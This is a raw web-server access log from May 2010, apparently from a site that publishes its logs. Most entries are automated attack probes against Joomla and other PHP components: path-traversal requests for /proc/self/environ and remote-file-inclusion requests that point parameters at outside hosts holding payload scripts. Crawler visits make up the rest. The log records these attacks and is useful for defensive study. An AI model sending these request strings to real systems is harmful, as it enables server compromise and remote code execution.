206.123.118.132 - - [19/May/2010:01:07:35 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:07:35 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:07:35 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:07:55 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:07:56 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:07:56 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:03 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:03 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:03 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:01:08:15 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:01:08:16 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:01:08:16 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:32 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:32 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:32 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:48 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:48 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:08:48 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
211.239.161.143 - - [19/May/2010:01:09:40 -0500] "GET //index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.239.161.143 - - [19/May/2010:01:09:40 -0500] "GET /logs//index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.239.161.143 - - [19/May/2010:01:09:52 -0500] "GET //index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.239.161.143 - - [19/May/2010:01:09:53 -0500] "GET /logs//index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
124.0.74.195 - - [19/May/2010:01:10:26 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.0.74.195 - - [19/May/2010:01:10:26 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.0.74.195 - - [19/May/2010:01:10:26 -0500] "GET /logs/access_log.1265760000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.0.74.195 - - [19/May/2010:01:10:31 -0500] "GET /logs/access_log.1265241600//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.46.13.141 - - [19/May/2010:01:11:06 -0500] "GET /logs/access_log.1160006400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.42 - - [19/May/2010:01:12:36 -0500] "GET /logs/access_log.1267574400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
111.67.9.133 - - [19/May/2010:01:14:00 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:01:14:01 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:01:14:01 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
67.195.112.180 - - [19/May/2010:01:15:05 -0500] "GET /logs/access_log.1218931200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.85 - - [19/May/2010:01:15:36 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [19/May/2010:01:16:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
211.43.201.70 - - [19/May/2010:01:16:06 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [19/May/2010:01:16:19 -0500] "GET /logs/access_log.1222905600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
111.67.9.133 - - [19/May/2010:01:18:24 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
87.250.255.243 - - [19/May/2010:01:18:42 -0500] "GET /logs/access_log.1219449600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.143.84.59 - - [19/May/2010:01:20:09 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.143.84.59 - - [19/May/2010:01:20:09 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
83.143.84.59 - - [19/May/2010:01:20:10 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
200.234.200.72 - - [19/May/2010:01:20:12 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.234.200.72 - - [19/May/2010:01:20:12 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.234.200.72 - - [19/May/2010:01:20:13 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.143.84.59 - - [19/May/2010:01:20:24 -0500] "GET /logs/access_log.1263772800//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:01:20:29 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:01:20:29 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
83.143.84.59 - - [19/May/2010:01:20:41 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.143.84.59 - - [19/May/2010:01:20:41 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
83.143.84.59 - - [19/May/2010:01:20:41 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
83.143.84.59 - - [19/May/2010:01:20:50 -0500] "GET /logs/access_log.1262995200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.199.49 - - [19/May/2010:01:21:06 -0500] "GET /logs/access_log.1199232000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.125.181.214 - - [19/May/2010:01:27:10 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
58.125.181.214 - - [19/May/2010:01:27:10 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
58.125.181.214 - - [19/May/2010:01:27:10 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
58.125.181.214 - - [19/May/2010:01:27:10 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:01:32:04 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [19/May/2010:01:33:17 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.50.85.15 - - [19/May/2010:01:33:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.50.85.15 - - [19/May/2010:01:33:17 -0500] "GET /logs/access_log.1265760000//skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.50.85.15 - - [19/May/2010:01:33:17 -0500] "GET /logs/access_log.1265241600//skin/zero_vote/error.php?dir=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
200.234.200.72 - - [19/May/2010:01:34:07 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.190.102.21 - - [19/May/2010:01:34:14 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:01:34:14 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:01:34:14 -0500] "GET /logs/access_log.1265673600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:01:34:51 -0500] "GET /logs/access_log.1266019200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
220.181.7.16 - - [19/May/2010:01:35:28 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.127.70.140 - - [19/May/2010:01:36:11 -0500] "GET /nav.php?pagina=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:01:36:11 -0500] "GET /logs/nav.php?pagina=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
216.127.70.140 - - [19/May/2010:01:36:11 -0500] "GET /logs/access_log.1262563200/nav.php?pagina=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.46.204.185 - - [19/May/2010:01:39:36 -0500] "GET /logs/access_log.1246233600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.152.145.54 - - [19/May/2010:01:40:28 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:40:28 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:40:28 -0500] "GET /logs/access_log.1273363200%20%20//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:41:38 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:41:38 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:41:38 -0500] "GET /logs/access_log.1273363200%20%20//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:01:43:18 -0500] "GET /logs/access_log.1255046400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.178 - - [19/May/2010:01:43:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.152.145.54 - - [19/May/2010:01:43:54 -0500] "GET /logs/access_log.1273363200//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:43:54 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:43:54 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:30 -0500] "GET //ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:30 -0500] "GET /logs/access_log.1264204800//ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:30 -0500] "GET /logs//ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:35 -0500] "GET //ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:35 -0500] "GET /logs//ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:35 -0500] "GET /logs/access_log.1264204800//ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:45 -0500] "GET /logs/access_log.1266192000//ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:01:46:51 -0500] "GET /logs/access_log.1266192000//ashheadlines.php?pathtoashnews=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.43.201.70 - - [19/May/2010:01:49:45 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.43.201.70 - - [19/May/2010:01:49:46 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.201.70 - - [19/May/2010:01:49:52 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
190.152.145.54 - - [19/May/2010:01:52:31 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:52:31 -0500] "GET /logs/access_log.1271116800//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:52:31 -0500] "GET /logs/access_log.1264723200//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:52:31 -0500] "GET /logs//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:54:13 -0500] "GET /logs/access_log.1266710400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:54:13 -0500] "GET /logs/access_log.1271376000//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:54:13 -0500] "GET /logs/access_log.1265414400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
90.183.248.17 - - [19/May/2010:01:55:17 -0500] "GET /logs/components/com_virtuemart=http://playersinn.com/darts/idx? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.183.248.17 - - [19/May/2010:01:55:17 -0500] "GET /components/com_virtuemart=http://playersinn.com/darts/idx? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
190.152.145.54 - - [19/May/2010:01:55:45 -0500] "GET /logs/access_log.1265673600//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:55:45 -0500] "GET /logs/access_log.1265587200//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:55:46 -0500] "GET /logs/access_log.1265068800//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:55:47 -0500] "GET /logs/access_log.1266019200//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
208.115.111.248 - - [19/May/2010:01:57:13 -0500] "GET /logs/access_log.1211414400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:15 -0500] "GET /logs/access_log.1211500800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:17 -0500] "GET /logs/access_log.1211673600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:20 -0500] "GET /logs/access_log.1211760000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
190.152.145.54 - - [19/May/2010:01:57:20 -0500] "GET /logs/access_log.1266192000//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:57:20 -0500] "GET /logs/access_log.1265241600//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:57:23 -0500] "GET /logs/access_log.1263081600//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:57:23 -0500] "GET /logs/access_log.1262822400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:57:23 -0500] "GET /logs/access_log.1265760000//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
208.115.111.248 - - [19/May/2010:01:57:23 -0500] "GET /logs/access_log.1211846400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:24 -0500] "GET /logs/access_log.1211932800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:27 -0500] "GET /logs/access_log.1212019200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:29 -0500] "GET /logs/access_log.1212105600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:32 -0500] "GET /logs/access_log.1212192000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [19/May/2010:01:57:34 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
190.152.145.54 - - [19/May/2010:01:58:44 -0500] "GET /logs/access_log.1264118400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:01:58:44 -0500] "GET /logs/access_log.1264636800//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:01:59:02 -0500] "GET /logs/access_log.1243728000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
128.121.136.192 - - [19/May/2010:01:59:22 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 6132 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:23 -0500] "GET /logs/access_log.1266537600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:23 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 991 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:32 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:39 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 991 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:55 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 6132 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:55 -0500] "GET /logs/access_log.1266537600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:56 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:58 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 6132 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:58 -0500] "GET /logs/access_log.1266537600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
